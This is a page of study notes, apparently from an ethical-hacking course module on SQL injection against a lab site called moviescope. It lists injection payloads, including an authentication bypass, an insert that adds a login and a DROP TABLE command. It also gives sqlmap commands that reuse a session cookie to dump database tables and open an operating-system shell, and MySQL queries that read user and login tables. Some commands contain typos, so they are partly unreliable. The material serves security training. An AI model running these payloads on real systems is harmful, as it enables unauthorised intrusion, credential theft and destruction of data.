1. Perform SQL Injection attacks

1. SQL Injection on MSSQL Database

Payloads to check the injection

'OR 1=1 --

Operations on database

Admin'; Insert into login values('john','apple123');--  //adding entry
blah'; DROP TABLE users; --

2. Extract MSSQL Database with SQL MAP

To retrieve cookie from console

document.cookie

Now use the following commands to extract the database.

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

To get a shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
TASKLIST
help

MySQL commands

mysql -U qdpmadmin -h 192.168.1.8 -P passwod 
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;
PreviousModule 15. SQL InjectionNext2. Detect SQL Vulnerabilities using different tool

Last updated